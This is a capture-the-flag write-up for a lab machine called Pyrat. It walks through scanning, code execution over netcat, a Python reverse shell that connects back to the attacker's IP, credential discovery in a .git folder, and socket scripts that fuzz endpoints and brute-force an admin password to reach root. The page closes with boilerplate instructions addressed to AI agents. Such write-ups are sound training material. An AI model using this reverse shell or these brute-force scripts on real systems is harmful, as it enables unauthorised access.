# Pyrat {% embed url="" %} Room Link {% endembed %} This work by Manav G Krishna is licensed under [CC BY-NC 4.0](http://creativecommons.org/licenses/by-nc/4.0/?ref=chooser-v1)

**`Room's Description`**:

**`Machine IP`**: 10.10.192.46 **`Hosts file entry`**: echo '10.10.192.46 pyrat.thm' | sudo tee -a /etc/hosts **`Nmap Scan`**: ```bash nmap -p- -A -v --min-rate 100 -oN pyrat_thm -Pn pyrat.thm Nmap scan report for pyrat.thm (10.10.192.46) Host is up (0.16s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA) | 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA) |_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519) 8000/tcp open http-alt SimpleHTTP/0.6 Python/3.11.2 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-open-proxy: Proxy might be redirecting requests |_http-favicon: Unknown favicon MD5: FBD3DB4BEF1D598ED90E26610F23A63F |_http-title: Site doesn't have a title (text/html; charset=utf-8). |_http-server-header: SimpleHTTP/0.6 Python/3.11.2 | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, JavaRMI, LANDesk-RC, NotesRPC, Socks4, X11Probe, afp, giop: | source code string cannot contain null bytes | FourOhFourRequest, LPDString, SIPOptions: | invalid syntax (, line 1) | GetRequest: | name 'GET' is not defined | HTTPOptions, RTSPRequest: | name 'OPTIONS' is not defined | Help: |_ name 'HELP' is not defined 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8000-TCP:V=7.94SVN%I=7%D=10/3%Time=66FE3CBC%P=x86_64-pc-linux-gnu%r SF:(GenericLines,1,"\n")%r(GetRequest,1A,"name\x20'GET'\x20is\x20not\x20de SF:fined\n")%r(X11Probe,2D,"source\x20code\x20string\x20cannot\x20contain\ SF:x20null\x20bytes\n")%r(FourOhFourRequest,22,"invalid\x20syntax\x20\(,\x20line\x201\)\n")%r(Socks4,2D,"source\x20code\x20string\x20cann SF:ot\x20contain\x20null\x20bytes\n")%r(HTTPOptions,1E,"name\x20'OPTIONS'\ SF:x20is\x20not\x20defined\n")%r(RTSPRequest,1E,"name\x20'OPTIONS'\x20is\x SF:20not\x20defined\n")%r(DNSVersionBindReqTCP,2D,"source\x20code\x20strin SF:g\x20cannot\x20contain\x20null\x20bytes\n")%r(DNSStatusRequestTCP,2D,"s SF:ource\x20code\x20string\x20cannot\x20contain\x20null\x20bytes\n")%r(Hel SF:p,1B,"name\x20'HELP'\x20is\x20not\x20defined\n")%r(LPDString,22,"invali SF:d\x20syntax\x20\(,\x20line\x201\)\n")%r(SIPOptions,22,"invalid\ SF:x20syntax\x20\(,\x20line\x201\)\n")%r(LANDesk-RC,2D,"source\x20 SF:code\x20string\x20cannot\x20contain\x20null\x20bytes\n")%r(NotesRPC,2D, SF:"source\x20code\x20string\x20cannot\x20contain\x20null\x20bytes\n")%r(J SF:avaRMI,2D,"source\x20code\x20string\x20cannot\x20contain\x20null\x20byt SF:es\n")%r(afp,2D,"source\x20code\x20string\x20cannot\x20contain\x20null\ SF:x20bytes\n")%r(giop,2D,"source\x20code\x20string\x20cannot\x20contain\x SF:20null\x20bytes\n"); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.94SVN%E=4%D=10/3%OT=22%CT=1%CU=42699%PV=Y%DS=2%DC=T%G=Y%TM=66FE OS:3D34%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=101%TI=Z%CI=Z%TS=A)OPS(O1 OS:=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST11NW OS:6%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R= OS:Y%DF=Y%T=40%W=F507%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%R OS:D=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T4(R=Y% OS:DF=Y%T=40%W=0%S=O%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=O%F=AR%O OS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40 OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=O%A=Z%F=R%O=%RD=0%Q=) OS:T7(R=Y%DF=Y%T=40%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A= OS:S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU OS:CK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Uptime guess: 6.108 days (since Fri Sep 27 09:37:53 2024) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=255 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 587/tcp) HOP RTT ADDRESS 1 193.28 ms 10.11.0.1 2 194.14 ms pyrat.thm (10.10.192.46) ``` The scan results show that we have two ports open, that is port **`22`** & **`8000`** . ### Enumeration **`Checking out port 8000`**:

The page tells us to try an even more **`basic connection`**. The only thing that comes to mind is either **`netcat`** or **`telnet`**. Port **`23`** ain't open on the machine, leaving us with just **`netcat`**. We can now connect to the port via **`netcat`**, like so: ```bash nc pyrat.thm 8000 -v ```

We are **`connected`**. From the **`Nmap scan`** results, we notice that the version results for port **`8000`** says - **`SimpleHTTP/0.6 Python/3.11.2`**. This means it is a **`Python-based HTTP`** server. So our interaction with the **`netcat`** connection will highly likely be through **`Python`**. To confirm the same we can execute a simple **`print`** command:

And indeed we get the output. This confirms that we are on a **`Python shell`**. We can also try to find the exact **`Python version`** that could be running: ```python import sys print(sys.version) ```

We are on **`3.8.10`**. So the fingerprinting that **`Nmap`** did (**`3.11.2`**) wasn't accurate. Now that we have tested enough stuff and have fully confirmed that we are having a **`Python`** interaction via the **`netcat`** connection, we can go ahead and try to run a **`Python reverse shell`** command to see what we are presented with. ### Exploitation & Foothold **`Python Reverse Shell`**: ```python import socket, subprocess, os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(('10.11.75.84',4545)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(['/bin/sh','-i']) ``` The **`IP`** specified in the command is the **`tun0`** interface **`IP`**. Now, we can set up a **`netcat`** listener on our **`attacker machine`** and execute the above command.

And we get a connection as **`www-data`**. ### Further Enumeration Firstly we can proceed to **`upgrade`** the current shell a little. **`Commands`**: ```python python3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm ```

We land directly within the **`/root`** directory. From the **`/etc/passwd`** file contents we have a user other than root having a **`console`**, that being - **`think`**:

Let us now start **`traversing`** other **`common directories`** hoping to find some good **`information`**. Moreover, the room's description says that we would be able to find some **`credentials`** within a **`well-known folder`**, it could be **`think's password`**!? **`Good directories`** to look into:

**`/opt`** and **`/var`**. **`Checking out /opt`**:

There is a **`.git`** directory. Having access to this folder can help us retrieve some **`code`** or **`sensitive data`**.

There is a file named **`config`**.

And we get the user **`think's`** **`password`**. Now we can **`SSH`** in as **`think`**: **`Command`**: ```bash ssh think@pyrat.thm ```

We get the **`user flag`** in think's **`home`** directory:

Now let us get back to the **`.git`** folder within the **`/opt`** directory as we hadn't fully enumerated it before. Instead of manually examining all those files under the **`.git`** directory, we can use **`Git commands`** to retrieve useful information. We do have the **`git`** utility on the machine:

**`Commands`**: ```bash git rev-list --count --all //Displays the total number of commits ``` ```bash git log //Displays the commit history ``` ```bash git show //Displays details of the commit ```

We have only **`1`** commit.

The **`commit message`** says that a **`shell endpoint`** was added or it could mean the endpoint's name is **`shell`**. The description of the room talks about endpoints and **`shell`** might be an endpoint too.

This is the **`latest`** or the most recent commit (**`HEAD -> master`**). However, the file name **`pyrat.py.old`** suggests that it may be an older version of a script called **`pyrat.py`**. Even though we don't have the full code, what it is mainly saying is this: It allows a server to respond to commands received from us over a **`socket connection`**. The **`switch_case`** function checks the input given by us and decides what action to take. If the input is **`some_endpoint`**, it calls a specific function. If the input is **`shell`**, it gives us access to a command line shell on the server, to execute commands. So we now know that we have an endpoint named **`shell`**. Even though the script might not be the latest code, we can still give it a try by passing this endpoint on the **`netcat`** shell to see if it still stands valid:

And it works. We get a shell as **`www-data`**. Now let us try to see what is up with that **`some_endpoint`**. **`Passing in some_endpoint`**:

So this confirms that this is the **`special endpoint`** that we have to **`fuzz`** for as mentioned in the description of the room. **`These lines`**: ```python if data == 'some_endpoint': get_this_enpoint(client_socket) ``` Says that there is some **`other endpoint`** that is present (**`1st line`**) and that endpoint is being used like so: **`get_[that endpoint]`** (**`2nd line`**). We can now go ahead and **`fuzz`** out that so-called **`special endpoint`** via some simple **`Python scripting`**. ### Privilege Escalation **`Endpoint Fuzzing Script`**: Firstly we have to fetch a **`wordlist`**: {% embed url="" %} Wordlist {% endembed %} I have named the wordlist file: **`endpoints.txt`** ```python import socket def fuzz_endpoints(target_ip, target_port, wordlist): with open(wordlist, 'r') as file: endpoints = file.read().splitlines() for endpoint in endpoints: try: # Create a socket connection with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client_socket: client_socket.connect((target_ip, target_port)) # Send the endpoint client_socket.sendall(endpoint.encode() + b'\n') # Receive the response response = client_socket.recv(4096).decode() # Print the response print(f'Response for {endpoint}: {response}') except Exception as e: print(f'Error connecting to {target_ip}:{target_port} - {str(e)}') if __name__ == "__main__": TARGET_IP = 'pyrat.thm' TARGET_PORT = 8000 WORDLIST = 'endpoints.txt' # Replace with your wordlist path fuzz_endpoints(TARGET_IP, TARGET_PORT, WORDLIST) ``` And we get a **`valid hit`**:

When **`admin`** was passed, the response from the server was - **`Password:`** **`Passing the same`**:

So we now have found out that **`special endpoint`**, that being - **`admin`**. **`Fuzzing`** for the **`password`** is what should be done at this point, **`admin password`**. It is safe to assume the same as the **`endpoint`** is named **`admin`**, so we have to find the **`admin's password`** which we aren't aware of yet. **`Password Fuzzing Script`**: For this, we would be using the **`rockyou.txt`** wordlist. ```python import socket def fuzz_admin_passwords(target_ip, target_port, password_wordlist): admin_endpoint = "admin" with open(password_wordlist, 'r', errors='ignore') as file: passwords = file.read().splitlines() for password in passwords: try: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client_socket: client_socket.connect((target_ip, target_port)) # Send the admin endpoint client_socket.sendall(f"{admin_endpoint}\n".encode()) # Receive the response (for admin prompt) response = client_socket.recv(4096).decode() print(f'Response for {admin_endpoint}: {response}') # Send the password client_socket.sendall(f"{password}\n".encode()) # Receive the response (for password attempt) response = client_socket.recv(4096).decode() # Print the response print(f'Trying password "{password}": {response}') except Exception as e: print(f'Error connecting to {target_ip}:{target_port} - {str(e)}') if __name__ == "__main__": TARGET_IP = 'pyrat.thm' TARGET_PORT = 8000 WORDLIST = '/usr/share/wordlists/rockyou.txt' fuzz_admin_passwords(TARGET_IP, TARGET_PORT, WORDLIST) ``` And we again get a **`hit`**:

The response from the server when the **`valid password`** was tried: **`Welcome Admin!!! Type "shell" to begin`**. Now we can go ahead and enter the **`password`**:

We are now **`root`**. The **`root flag`** can be fetched from the **`/root`** directory.

Room solved!! ### Alternate Approach To Finding The Special Endpoint (admin) This is something I **`overlooked`** when I initially completed the room, in the sense didn't put much thought into that aspect even though I saw it a lot many times on the machine. I will be diving straight into it without any story-building. **`Checking out /var/mail`**:

The **`mail`** talks about a **`RAT`** that was downloaded by a person from a **`GitHub page`** that belongs to **`Jose`**. And we had come across **`Jose's email ID`** a lot many times on the machine, a few instances being in the **`config`** file contents, in the output of the **`git log`**, **`git show`** commands, etc.

That **`email`** when searched led us to the **`GitHub`** account of the **`maker`** of this very room.

There is a **`repo`** called **`PyRAT`** in it: {% embed url="" %} This **`repo`** reveals the **`special endpoint`** which was **`admin`**:

The **`code`** too in the **`repo`** reveals the same and it is the **`same exact code`** that is running on this room as a **`cron job`** as **`root`**:

**`The code`**:

{% embed url="" %} Profile Link {% endembed %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://manav-g-krishna.gitbook.io/tryhackme-writeups/pyrat.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.